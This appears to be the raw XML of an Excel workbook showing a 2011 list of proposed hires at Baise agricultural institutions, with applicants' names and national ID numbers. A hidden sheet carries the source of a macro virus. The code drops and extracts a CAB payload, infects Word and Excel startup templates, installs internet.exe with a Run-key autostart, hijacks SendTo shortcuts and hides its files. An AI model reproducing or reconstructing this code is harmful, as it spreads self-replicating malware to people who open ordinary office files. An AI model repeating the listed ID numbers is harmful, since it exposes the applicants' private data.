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firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="NSJYBRRTALMJNR" sheetId="1" state="hidden"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="264" uniqueCount="241">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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性别</t>
  </si>
  <si>
    <t>民族</t>
  </si>
  <si>
    <t>毕业院校</t>
  </si>
  <si>
    <t>照顾加分</t>
  </si>
  <si>
    <t>壮族</t>
  </si>
  <si>
    <t>女</t>
  </si>
  <si>
    <t>黄捷</t>
  </si>
  <si>
    <t>452622198009223327</t>
  </si>
  <si>
    <t>11226067124</t>
  </si>
  <si>
    <t>华中农业大学</t>
  </si>
  <si>
    <t>男</t>
  </si>
  <si>
    <t>百色市玉米研究所</t>
  </si>
  <si>
    <t>技术岗位（093001）</t>
  </si>
  <si>
    <t>姓名</t>
  </si>
  <si>
    <t>身份证号</t>
  </si>
  <si>
    <t>准考证号</t>
  </si>
  <si>
    <t>报考单位</t>
  </si>
  <si>
    <t>报考岗位及代码</t>
  </si>
  <si>
    <t>百色市经济作物栽培技术推广站</t>
  </si>
  <si>
    <t>技术岗位（092001）</t>
  </si>
  <si>
    <t>面试（专业测试）分</t>
  </si>
  <si>
    <t>总成绩</t>
  </si>
  <si>
    <t>岗位排名</t>
  </si>
  <si>
    <t>黄大勇</t>
  </si>
  <si>
    <t>452626198610023014</t>
  </si>
  <si>
    <t>广西大学</t>
  </si>
  <si>
    <t>笔试
成绩</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>2</t>
  </si>
  <si>
    <t>体检</t>
  </si>
  <si>
    <t>考核</t>
  </si>
  <si>
    <t>合格</t>
  </si>
  <si>
    <t>2011年百色市农业局直属事业单位拟聘用人员名单</t>
  </si>
  <si>
    <t>Private Sub createcabfile()</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t>End Sub</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</si>
</sst>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Red]\(0.00\)"/>
    <numFmt numFmtId="178" formatCode="000000"/>
    <numFmt numFmtId="179" formatCode="&quot;是&quot;;&quot;是&quot;;&quot;否&quot;"/>
    <numFmt numFmtId="180" formatCode="&quot;真&quot;;&quot;真&quot;;&quot;假&quot;"/>
    <numFmt numFmtId="181" formatCode="&quot;开&quot;;&quot;开&quot;;&quot;关&quot;"/>
  </numFmts>
  <fonts count="10">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="12"/>
      <color indexed="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="12"/>
      <color indexed="36"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>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protection/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>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cellStyleXfs>
  <cellXfs count="12">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="0"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17" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="177" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="5" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="15">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="49" fontId="9" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
  </cellXfs>
  <cellStyles count="9">
    <cellStyle name="Normal" xfId="0"/>
    <cellStyle name="Percent" xfId="16"/>
    <cellStyle name="常规_Sheet1" xfId="17"/>
    <cellStyle name="Hyperlink" xfId="18"/>
    <cellStyle name="Currency" xfId="19"/>
    <cellStyle name="Currency [0]" xfId="20"/>
    <cellStyle name="Comma" xfId="21"/>
    <cellStyle name="Comma [0]"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9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="19.25390625" style="0" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" style="9" customWidth="1"/>
    <col min="3" max="3" width="31.875" style="10" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="0" style="0" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:3" ht="15">
      <c r="B1" s="9" t="s">
        <v>123</v>
      </c>
      <c r="C1" s="10" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="2" spans="2:3" ht="15">
      <c r="B2" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C2" s="10" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="3" spans="2:3" ht="15.75">
      <c r="B3" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C3" s="11" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="4" spans="2:3" ht="15">
      <c r="B4" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C4" s="10" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="5" spans="2:3" ht="15">
      <c r="B5" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C5" s="10" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="6" spans="2:3" ht="15">
      <c r="B6" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C6" s="10" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="7" spans="2:3" ht="15">
      <c r="B7" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C7" s="10" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="8" spans="2:3" ht="15">
      <c r="B8" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C8" s="10" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="9" spans="2:3" ht="15">
      <c r="B9" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C9" s="10" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="10" spans="2:3" ht="15.75">
      <c r="B10" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C10" s="11" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="11" spans="2:3" ht="15.75">
      <c r="B11" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C11" s="11" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="12" spans="2:3" ht="15.75">
      <c r="B12" s="9" t="s">
        <v>124</v>
      </c>
      <c r="C12" s="11" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="13" spans="2:3" ht="15">
      <c r="B13" s="9" t="s">
        <v>125</v>
      </c>
      <c r="C13" s="10" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="14" spans="2:3" ht="15.75">
      <c r="B14" s="9" t="s">
        <v>126</v>
      </c>
      <c r="C14" s="11" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="15" spans="2:3" ht="15.75">
      <c r="B15" s="9" t="s">
        <v>127</v>
      </c>
      <c r="C15" s="11" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="16" spans="2:3" ht="15.75">
      <c r="B16" s="9" t="s">
        <v>128</v>
      </c>
      <c r="C16" s="11" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="17" spans="2:3" ht="15.75">
      <c r="B17" s="9" t="s">
        <v>129</v>
      </c>
      <c r="C17" s="11" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="18" spans="2:3" ht="15.75">
      <c r="B18" s="9" t="s">
        <v>130</v>
      </c>
      <c r="C18" s="11" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="19" spans="2:3" ht="15.75">
      <c r="B19" s="9" t="s">
        <v>131</v>
      </c>
      <c r="C19" s="11" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="20" spans="2:3" ht="15.75">
      <c r="B20" s="9" t="s">
        <v>132</v>
      </c>
      <c r="C20" s="11" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="21" spans="2:3" ht="15">
      <c r="B21" s="9" t="s">
        <v>133</v>
      </c>
      <c r="C21" s="10" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="22" spans="2:3" ht="15">
      <c r="B22" s="9" t="s">
        <v>134</v>
      </c>
      <c r="C22" s="10" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="23" spans="2:3" ht="15.75">
      <c r="B23" s="9" t="s">
        <v>104</v>
      </c>
      <c r="C23" s="11" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="24" spans="2:3" ht="15.75">
      <c r="B24" s="9" t="s">
        <v>105</v>
      </c>
      <c r="C24" s="11" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="25" spans="2:3" ht="15">
      <c r="B25" s="9" t="s">
        <v>106</v>
      </c>
      <c r="C25" s="10" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="26" spans="2:3" ht="15.75">
      <c r="B26" s="9" t="s">
        <v>107</v>
      </c>
      <c r="C26" s="11" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="27" spans="2:3" ht="15.75">
      <c r="B27" s="9" t="s">
        <v>108</v>
      </c>
      <c r="C27" s="11" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="28" spans="2:3" ht="15.75">
      <c r="B28" s="9" t="s">
        <v>109</v>
      </c>
      <c r="C28" s="11" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="29" spans="2:3" ht="15.75">
      <c r="B29" s="9" t="s">
        <v>110</v>
      </c>
      <c r="C29" s="11" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="30" spans="2:3" ht="15.75">
      <c r="B30" s="9" t="s">
        <v>111</v>
      </c>
      <c r="C30" s="11" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="31" spans="2:3" ht="15.75">
      <c r="B31" s="9" t="s">
        <v>112</v>
      </c>
      <c r="C31" s="11" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="32" spans="2:3" ht="15.75">
      <c r="B32" s="9" t="s">
        <v>113</v>
      </c>
      <c r="C32" s="11" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="33" spans="2:3" ht="15.75">
      <c r="B33" s="9" t="s">
        <v>114</v>
      </c>
      <c r="C33" s="11" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="34" spans="2:3" ht="15.75">
      <c r="B34" s="9" t="s">
        <v>115</v>
      </c>
      <c r="C34" s="11" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="35" spans="2:3" ht="15">
      <c r="B35" s="9" t="s">
        <v>116</v>
      </c>
      <c r="C35" s="10" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="36" spans="2:3" ht="15.75">
      <c r="B36" s="9" t="s">
        <v>117</v>
      </c>
      <c r="C36" s="11" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="37" spans="2:3" ht="15">
      <c r="B37" s="9" t="s">
        <v>118</v>
      </c>
      <c r="C37" s="10" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="38" spans="2:3" ht="15">
      <c r="B38" s="9" t="s">
        <v>119</v>
      </c>
      <c r="C38" s="10" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="39" spans="2:3" ht="15">
      <c r="B39" s="9" t="s">
        <v>88</v>
      </c>
      <c r="C39" s="10" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="40" spans="2:3" ht="15">
      <c r="B40" s="9" t="s">
        <v>89</v>
      </c>
      <c r="C40" s="10" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="41" spans="2:3" ht="15">
      <c r="B41" s="9" t="s">
        <v>90</v>
      </c>
      <c r="C41" s="10" t="s">
        <v>205</v>
      </c>
    </row>
    <row r="42" spans="2:3" ht="15">
      <c r="B42" s="9" t="s">
        <v>91</v>
      </c>
      <c r="C42" s="10" t="s">
        <v>206</v>
      </c>
    </row>
    <row r="43" spans="2:3" ht="15.75">
      <c r="B43" s="9" t="s">
        <v>92</v>
      </c>
      <c r="C43" s="11" t="s">
        <v>207</v>
      </c>
    </row>
    <row r="44" spans="2:3" ht="15.75">
      <c r="B44" s="9" t="s">
        <v>93</v>
      </c>
      <c r="C44" s="11" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="45" spans="2:3" ht="15.75">
      <c r="B45" s="9" t="s">
        <v>94</v>
      </c>
      <c r="C45" s="11" t="s">
        <v>209</v>
      </c>
    </row>
    <row r="46" spans="2:3" ht="15">
      <c r="B46" s="9" t="s">
        <v>95</v>
      </c>
      <c r="C46" s="10" t="s">
        <v>210</v>
      </c>
    </row>
    <row r="47" spans="2:3" ht="15">
      <c r="B47" s="9" t="s">
        <v>96</v>
      </c>
      <c r="C47" s="10" t="s">
        <v>211</v>
      </c>
    </row>
    <row r="48" spans="2:3" ht="15">
      <c r="B48" s="9" t="s">
        <v>97</v>
      </c>
      <c r="C48" s="10" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="49" spans="2:3" ht="15">
      <c r="B49" s="9" t="s">
        <v>98</v>
      </c>
      <c r="C49" s="10" t="s">
        <v>213</v>
      </c>
    </row>
    <row r="50" spans="2:3" ht="15">
      <c r="B50" s="9" t="s">
        <v>99</v>
      </c>
      <c r="C50" s="10" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="51" spans="2:3" ht="15.75">
      <c r="B51" s="9" t="s">
        <v>100</v>
      </c>
      <c r="C51" s="11" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="52" spans="2:3" ht="15.75">
      <c r="B52" s="9" t="s">
        <v>101</v>
      </c>
      <c r="C52" s="10" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="53" spans="2:3" ht="15.75">
      <c r="B53" s="9" t="s">
        <v>102</v>
      </c>
      <c r="C53" s="11" t="s">
        <v>215</v>
      </c>
    </row>
    <row r="54" spans="2:3" ht="15.75">
      <c r="B54" s="9" t="s">
        <v>103</v>
      </c>
      <c r="C54" s="11" t="s">
        <v>216</v>
      </c>
    </row>
    <row r="55" spans="2:3" ht="15.75">
      <c r="B55" s="9" t="s">
        <v>72</v>
      </c>
      <c r="C55" s="11" t="s">
        <v>217</v>
      </c>
    </row>
    <row r="56" spans="2:3" ht="15.75">
      <c r="B56" s="9" t="s">
        <v>73</v>
      </c>
      <c r="C56" s="11" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="57" spans="2:3" ht="15.75">
      <c r="B57" s="9" t="s">
        <v>74</v>
      </c>
      <c r="C57" s="11" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="58" spans="2:3" ht="15.75">
      <c r="B58" s="9" t="s">
        <v>75</v>
      </c>
      <c r="C58" s="11" t="s">
        <v>220</v>
      </c>
    </row>
    <row r="59" spans="2:3" ht="15.75">
      <c r="B59" s="9" t="s">
        <v>76</v>
      </c>
      <c r="C59" s="11" t="s">
        <v>221</v>
      </c>
    </row>
    <row r="60" spans="2:3" ht="15.75">
      <c r="B60" s="9" t="s">
        <v>77</v>
      </c>
      <c r="C60" s="11" t="s">
        <v>222</v>
      </c>
    </row>
    <row r="61" spans="2:3" ht="15.75">
      <c r="B61" s="9" t="s">
        <v>78</v>
      </c>
      <c r="C61" s="11" t="s">
        <v>223</v>
      </c>
    </row>
    <row r="62" spans="2:3" ht="15.75">
      <c r="B62" s="9" t="s">
        <v>79</v>
      </c>
      <c r="C62" s="11" t="s">
        <v>224</v>
      </c>
    </row>
    <row r="63" spans="2:3" ht="15">
      <c r="B63" s="9" t="s">
        <v>80</v>
      </c>
      <c r="C63" s="10" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="64" spans="2:3" ht="15">
      <c r="B64" s="9" t="s">
        <v>81</v>
      </c>
      <c r="C64" s="10" t="s">
        <v>226</v>
      </c>
    </row>
    <row r="65" spans="2:3" ht="15">
      <c r="B65" s="9" t="s">
        <v>82</v>
      </c>
      <c r="C65" s="10" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="66" spans="2:3" ht="15">
      <c r="B66" s="9" t="s">
        <v>83</v>
      </c>
      <c r="C66" s="10" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="67" spans="2:3" ht="15">
      <c r="B67" s="9" t="s">
        <v>84</v>
      </c>
      <c r="C67" s="10" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="68" spans="2:3" ht="15.75">
      <c r="B68" s="9" t="s">
        <v>85</v>
      </c>
      <c r="C68" s="11" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="69" spans="2:3" ht="15.75">
      <c r="B69" s="9" t="s">
        <v>86</v>
      </c>
      <c r="C69" s="11" t="s">
        <v>230</v>
      </c>
    </row>
    <row r="70" spans="2:3" ht="15.75">
      <c r="B70" s="9" t="s">
        <v>87</v>
      </c>
      <c r="C70" s="11" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="71" spans="2:3" ht="15.75">
      <c r="B71" s="9" t="s">
        <v>56</v>
      </c>
      <c r="C71" s="11" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="72" spans="2:3" ht="15.75">
      <c r="B72" s="9" t="s">
        <v>57</v>
      </c>
      <c r="C72" s="11" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="73" spans="2:3" ht="15.75">
      <c r="B73" s="9" t="s">
        <v>58</v>
      </c>
      <c r="C73" s="11" t="s">
        <v>234</v>
      </c>
    </row>
    <row r="74" spans="2:3" ht="15">
      <c r="B74" s="9" t="s">
        <v>59</v>
      </c>
      <c r="C74" s="10" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="75" spans="2:3" ht="15.75">
      <c r="B75" s="9" t="s">
        <v>60</v>
      </c>
      <c r="C75" s="11" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="76" spans="2:3" ht="15.75">
      <c r="B76" s="9" t="s">
        <v>61</v>
      </c>
      <c r="C76" s="11" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="77" spans="2:3" ht="15">
      <c r="B77" s="9" t="s">
        <v>62</v>
      </c>
      <c r="C77" s="10" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="78" spans="2:3" ht="15.75">
      <c r="B78" s="9" t="s">
        <v>63</v>
      </c>
      <c r="C78" s="11" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="79" spans="2:3" ht="15.75">
      <c r="B79" s="9" t="s">
        <v>64</v>
      </c>
      <c r="C79" s="11" t="s">
        <v>220</v>
      </c>
    </row>
    <row r="80" spans="2:3" ht="15">
      <c r="B80" s="9" t="s">
        <v>65</v>
      </c>
      <c r="C80" s="10" t="s">
        <v>238</v>
      </c>
    </row>
    <row r="81" spans="2:3" ht="15.75">
      <c r="B81" s="9" t="s">
        <v>66</v>
      </c>
      <c r="C81" s="11" t="s">
        <v>239</v>
      </c>
    </row>
    <row r="82" spans="2:3" ht="15">
      <c r="B82" s="9" t="s">
        <v>67</v>
      </c>
      <c r="C82" s="10" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="83" ht="15">
      <c r="B83" s="9" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="84" ht="15">
      <c r="B84" s="9" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="85" ht="15">
      <c r="B85" s="9" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="86" ht="15">
      <c r="B86" s="9" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="87" ht="15">
      <c r="B87" s="9" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="88" ht="15">
      <c r="B88" s="9" t="s">
        <v>41</v>
      </c>
    </row>
